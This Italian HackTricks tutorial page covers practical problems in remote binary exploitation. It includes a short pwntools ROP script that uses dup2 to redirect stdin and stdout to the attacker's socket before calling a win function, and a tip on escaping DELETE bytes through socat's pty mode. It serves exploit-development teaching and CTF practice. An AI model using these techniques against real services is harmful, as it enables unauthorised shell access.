4.1 KiB
Problemi comuni di sfruttamento
Impara l'hacking AWS da zero a eroe con htARTE (Esperto Red Team AWS di HackTricks)!
- Lavori in una azienda di sicurezza informatica? Vuoi vedere la tua azienda pubblicizzata su HackTricks? o vuoi avere accesso all'ultima versione del PEASS o scaricare HackTricks in PDF? Controlla i PIANI DI ABBONAMENTO!
- Scopri La Famiglia PEASS, la nostra collezione di NFT esclusivi
- Ottieni il merchandising ufficiale di PEASS & HackTricks
- Unisciti al 💬 gruppo Discord o al gruppo telegram o seguimi su Twitter 🐦@carlospolopm.
- Condividi i tuoi trucchi di hacking inviando PR al repo di hacktricks e al repo di hacktricks-cloud.
FD in Sfruttamento Remoto
Quando si invia un exploit a un server remoto che chiama system('/bin/sh')
ad esempio, questo verrà eseguito nel processo del server e /bin/sh
si aspetterà input da stdin (FD: 0
) e stamperà l'output in stdout e stderr (FD 1
e 2
). Quindi l'attaccante non potrà interagire con la shell.
Un modo per risolvere questo problema è supporre che quando il server è stato avviato ha creato il numero FD 3
(per l'ascolto) e che poi, la connessione avverrà nel numero FD 4
. Pertanto, è possibile utilizzare la syscall dup2
per duplicare lo stdin (FD 0) e lo stdout (FD 1) nel FD 4 (quello della connessione dell'attaccante) in modo da rendere possibile contattare la shell una volta eseguita.
from pwn import *
elf = context.binary = ELF('./vuln')
p = remote('localhost', 9001)
rop = ROP(elf)
rop.raw('A' * 40)
rop.dup2(4, 0)
rop.dup2(4, 1)
rop.win()
p.sendline(rop.chain())
p.recvuntil('Thanks!\x00')
p.interactive()
Socat & pty
Si noti che socat trasferisce già stdin
e stdout
al socket. Tuttavia, la modalità pty
include i caratteri DELETE. Quindi, se invii un \x7f
(DELETE
), cancellerà il carattere precedente del tuo exploit.
Per aggirare questo problema, il carattere di escape \x16
deve essere anteposto a qualsiasi \x7f
inviato.
Qui puoi trovare un esempio di questo comportamento.
Impara l'hacking di AWS da zero a esperto con htARTE (HackTricks AWS Red Team Expert)!
- Lavori in una azienda di sicurezza informatica? Vuoi vedere la tua azienda pubblicizzata in HackTricks? o vuoi avere accesso all'ultima versione del PEASS o scaricare HackTricks in PDF? Controlla i PIANI DI ABBONAMENTO!
- Scopri The PEASS Family, la nostra collezione di NFT esclusivi
- Ottieni il PEASS & HackTricks swag ufficiale
- Unisciti al 💬 gruppo Discord o al gruppo telegram o seguimi su Twitter 🐦@carlospolopm.
- Condividi i tuoi trucchi di hacking inviando PR al repo hacktricks e al repo hacktricks-cloud.